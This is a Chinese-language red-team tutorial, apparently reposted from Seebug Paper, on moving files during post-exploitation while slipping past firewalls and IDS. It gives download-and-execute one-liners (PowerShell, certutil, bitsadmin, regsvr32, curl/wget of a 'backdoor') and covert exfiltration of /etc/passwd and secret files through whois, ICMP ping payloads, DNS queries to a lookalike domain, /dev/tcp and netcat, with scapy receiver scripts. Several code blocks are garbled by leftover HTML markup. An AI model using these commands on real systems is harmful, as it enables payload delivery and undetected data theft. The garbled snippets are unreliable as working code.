红队后渗透测试中的文件传输技巧

栏目: Python · 发布时间: 5年前

内容简介:在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。python2:以上命令会在当前目录启动 HTTP 服务,端口为 1337

作者:xax007@知道创宇404 ScanV安全服务团队
作者博客: https://xax007.github.io/

在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的 工具 进行文件传输的方法。

搭建 HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

python3:

python -m http.server 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

PHP 5.4+

PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337

php -S 0.0.0.0:1337

Ruby

下面的命令会在当前目录下启动 HTTP 服务,端口为 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

<span class="nt">perl</span> <span class="nt">-MHTTP</span><span class="p">::</span><span class="nd">Server</span><span class="p">::</span><span class="nd">Brick</span> <span class="nt">-e</span> <span class="s1">'$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'</span>
<span class="nt">perl</span> <span class="nt">-MIO</span><span class="p">::</span><span class="nd">All</span> <span class="nt">-e</span> <span class="s1">'io(":8080")->fork->accept->(sub { $_</span><span class="cp">[</span><span class="mi">0</span><span class="cp">]</span><span class="s1"> < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'</span>

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

本条来自: lvm

Download files from HTTP server

以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法

Windows

powershell

下载并执行:

<span class="nt">powershell</span> <span class="o">(</span><span class="nt">new-object</span> <span class="nt">System</span><span class="p">.</span><span class="nc">Net</span><span class="p">.</span><span class="nc">WebClient</span><span class="o">)</span><span class="p">.</span><span class="nc">DownloadFile</span><span class="o">(</span><span class="s1">'http://1.2.3.4/5.exe'</span><span class="o">,</span><span class="s1">'c:\download\a.exe'</span><span class="o">);</span><span class="nt">start-process</span> <span class="s1">'c:\download\a.exe'</span>

certutil

下载并执行:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin

下载并执行:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

bitsadmin 的下载速度比较慢

regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl

curl http://1.2.3.4/backdoor

Wget

wget http://1.2.3.4/backdoor

awk

在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

效果:

红队后渗透测试中的文件传输技巧

Setup HTTP PUT server

以下列出了上传文件到 HTTP Server 的几种方法

使用 Nginx 搭建 HTTP PUT Server

mkdir -p /var/www/upload/ # 创建目录 
chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组
cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录
 
# 写入配置到 file_upload 文件
cat <<EOF > file_upload
server {
    listen 8001 default_server;
    server_name kali;
        location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# 写入完毕
cd ../sites-enable # 进入 nginx 虚拟主机启动目录
ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机
systemctl start nginx # 启动 Nginx

使用 Python 搭建 HTTP PUT Server

以下代码保存到 HTTPutServer.py 文件里:

<span class="c1"># ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="kn">from</span> <span class="nn">threading</span> <span class="kn">import</span> <span class="n">Thread</span>
<span class="kn">from</span> <span class="nn">BaseHTTPServer</span> <span class="kn">import</span> <span class="n">HTTPServer</span><span class="p">,</span> <span class="n">BaseHTTPRequestHandler</span>
 
 
 
<span class="k">class</span> <span class="nc">PUTHandler</span><span class="p">(</span><span class="n">BaseHTTPRequestHandler</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">do_PUT</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">length</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Content-Length'</span><span class="p">])</span>
        <span class="n">content</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">rfile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">length</span><span class="p">)</span>
        <span class="bp">self</span><span class="o">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span>
        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="p">[</span><span class="mi">1</span><span class="p">:],</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
            <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span>
 
 
<span class="k">def</span> <span class="nf">run_on</span><span class="p">(</span><span class="n">port</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s2">"Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ..."</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">))</span>
    <span class="n">server_address</span> <span class="o">=</span> <span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">)</span>
    <span class="n">httpd</span> <span class="o">=</span> <span class="n">HTTPServer</span><span class="p">(</span><span class="n">server_address</span><span class="p">,</span> <span class="n">PUTHandler</span><span class="p">)</span>
    <span class="n">httpd</span><span class="o">.</span><span class="n">serve_forever</span><span class="p">()</span>
 
 
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s2">"Usage:</span><span class="se">\n\t</span><span class="s2">python {0} ip 1337"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="n">ports</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">arg</span><span class="p">)</span> <span class="k">for</span> <span class="n">arg</span> <span class="ow">in</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">:]]</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">for</span> <span class="n">port_number</span> <span class="ow">in</span> <span class="n">ports</span><span class="p">:</span>
            <span class="n">server</span> <span class="o">=</span> <span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">run_on</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">[</span><span class="n">port_number</span><span class="p">])</span>
            <span class="n">server</span><span class="o">.</span><span class="n">daemon</span> <span class="o">=</span> <span class="bp">True</span> <span class="c1"># Do not make us wait for you to exit</span>
        <span class="n">server</span><span class="o">.</span><span class="n">start</span><span class="p">()</span>
        <span class="n">signal</span><span class="o">.</span><span class="n">pause</span><span class="p">()</span> <span class="c1"># Wait for interrupt signal, e.g. KeyboardInterrupt</span>
    <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span>
        <span class="k">print</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">Python HTTP PUT Server Stoped."</span>
        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

运行方法:

$ python HTTPutServer.py <span class="m">10</span>.10.10.100 <span class="m">1337</span>
Starting a HTTP PUT Server on <span class="m">10</span>.10.10.100 port <span class="m">1337</span> <span class="o">(</span>http://10.10.10.100:1337<span class="o">)</span> ...

上传文件到 HTTP PUT server

Linux

Curl

$ curl --upload-file secret.txt http://ip:port/

Wget

$ wget --method<span class="o">=</span>PUT --post-file<span class="o">=</span>secret.txt http://ip:port/

Windows

Powershell

$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

使用 Bash /dev/tcp 进行文件传输

首先需要监听端口

文件接收端:

nc -lvnp 1337 > secret.txt 

文件发送端:

cat secret.txt > /dev/tcp/ip/port

红队后渗透测试中的文件传输技巧

使用 SMB 协议进行文件传输

搭建简易 SMB Server

搭建简易SMB Server 需要用到 Impacket 项目的  smbserver.py 文件

Impacket 已默认安装在 Kali Linux 系统中

syntax: impacker-smbserver ShareName SharePath

$ mkdir smb <span class="c1"># 创建 smb 目录</span>
$ <span class="nb">cd</span> smb <span class="c1"># 进入 smb目录</span>
$ impacket-smbserver share <span class="sb">`</span><span class="nb">pwd</span><span class="sb">`</span> <span class="c1"># 在当前目录启动 SMB server,共享名称为 share</span>

效果:

红队后渗透测试中的文件传输技巧

从 SMB server 下载文件

copy \\IP\ShareName\file.exe file.exe

上传文件到 SMB server

net use x: \\IP\ShareName
 
copy file.txt x:
 
net use x: /delete

使用 whois 命令进行文件传输

/etc/passwd

Host A

Host B

接收端 Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d 

发送端 Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64` 

效果:

红队后渗透测试中的文件传输技巧

使用 ping 命令进行文件传输

secret.txt

Sender

Reciver

发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端:

以下代码保存到 ping_receiver.py

<span class="kn">import</span> <span class="nn">sys</span>
 
<span class="k">try</span><span class="p">:</span>
    <span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span>
    <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
 
 
<span class="k">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="o">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">ICMP</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">type</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
            <span class="n">data</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">load</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="p">:]</span>
            <span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="s1">'{data.decode("utf-8")}'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">,</span> <span class="n">sep</span><span class="o">=</span><span class="s2">""</span><span class="p">)</span>
 
<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">process_packet</span><span class="p">)</span>

执行方法:

python3 ping_receiver.py

效果

红队后渗透测试中的文件传输技巧

使用 dig 命令进行文件传输

/etc/passwd

Sender

Reciver

发送端:

<span class="n">xxd</span> <span class="o">-</span><span class="n">p</span> <span class="o">-</span><span class="n">c</span> <span class="mi">31</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span> <span class="o">|</span> <span class="k">while</span> <span class="n">read</span> <span class="n">line</span><span class="p">;</span> <span class="k">do</span> <span class="n">dig</span> <span class="mf">@172.16.1.100</span> <span class="o">+</span><span class="kt">short</span> <span class="o">+</span><span class="n">tries</span><span class="o">=</span><span class="mi">1</span> <span class="o">+</span><span class="n">time</span><span class="o">=</span><span class="mi">1</span> <span class="err">$</span><span class="n">line</span><span class="p">.</span><span class="n">gooogle</span><span class="p">.</span><span class="n">com</span><span class="p">;</span> <span class="n">done</span>

接收端:

以下代码使用了 python 的 scapy 模块,需要手动安装

代码保存到 dns_reciver.py 文件中

<span class="nn">try</span><span class="p">:</span>
    <span class="s s-Atom">from</span> <span class="s s-Atom">scapy</span><span class="p">.</span><span class="s s-Atom">all</span> <span class="s s-Atom">import</span> <span class="o">*</span>
<span class="nn">except</span><span class="p">:</span>
    <span class="nf">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span>
 
<span class="s s-Atom">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="s s-Atom">pkt</span><span class="p">)</span><span class="s s-Atom">:</span>
    <span class="s s-Atom">if</span> <span class="s s-Atom">pkt</span><span class="p">.</span><span class="nf">haslayer</span><span class="p">(</span><span class="nv">DNS</span><span class="p">)</span><span class="s s-Atom">:</span>
        <span class="s s-Atom">domain</span> <span class="o">=</span> <span class="s s-Atom">pkt</span><span class="p">[</span><span class="nv">DNS</span><span class="p">][</span><span class="nv">DNSQR</span><span class="p">].</span><span class="s s-Atom">qname</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="s s-Atom">'utf-8'</span><span class="p">)</span>
        <span class="s s-Atom">root_domain</span> <span class="o">=</span> <span class="s s-Atom">domain</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="s s-Atom">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
        <span class="s s-Atom">if</span> <span class="s s-Atom">root_domain</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="s s-Atom">'gooogle'</span><span class="p">)</span><span class="s s-Atom">:</span>
            <span class="nf">print</span><span class="p">(</span><span class="s s-Atom">f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}'</span><span class="p">,</span> <span class="s s-Atom">flush</span><span class="o">=</span><span class="nv">True</span><span class="p">,</span> <span class="s s-Atom">end=''</span><span class="p">)</span>
 
<span class="nf">sniff</span><span class="p">(</span><span class="s s-Atom">iface=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="s s-Atom">prn</span><span class="o">=</span><span class="s s-Atom">process_packet</span><span class="p">)</span>

运行方法:

python3 dns_reciver.py

效果:

红队后渗透测试中的文件传输技巧

红队后渗透测试中的文件传输技巧

使用 NetCat 进行文件传输

1.txt

A:10.10.10.100

B:10.10.10.200

接受端:

nc -l -p 1337 > 1.txt

发送端:

cat 1.txt | nc -l -p 1337

或者

nc 10.10.10.200 1337 < 1.txt

在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

红队后渗透测试中的文件传输技巧

参考链接

红队后渗透测试中的文件传输技巧

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址: https://paper.seebug.org/834/


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

创新者

创新者

[美] 沃尔特 · 艾萨克森 / 关嘉伟、牛小婧 / 中信出版社 / 2016-6 / 88.00

讲述了计算机和互联网从无到有的发展历程,并为我们生动地刻画出数字时代的创新者群像。 在近200年的数字化进程中群星闪耀,艾萨克森从一个计算机程序的创造者、诗人拜伦之女埃达说起,细数了这一群站在科学与人文交叉路口的创新者,他们包括通用型电子计算机的创造者奠奇利、科学家冯·诺依曼、仙童半导体公司的“八叛逆”、天才图灵、英特尔的格鲁夫、微软的比尔·盖茨、苹果公司的乔布斯、谷歌的拉里·佩奇等。《创新......一起来看看 《创新者》 这本书的介绍吧!

MD5 加密
MD5 加密

MD5 加密工具

RGB HSV 转换
RGB HSV 转换

RGB HSV 互转工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具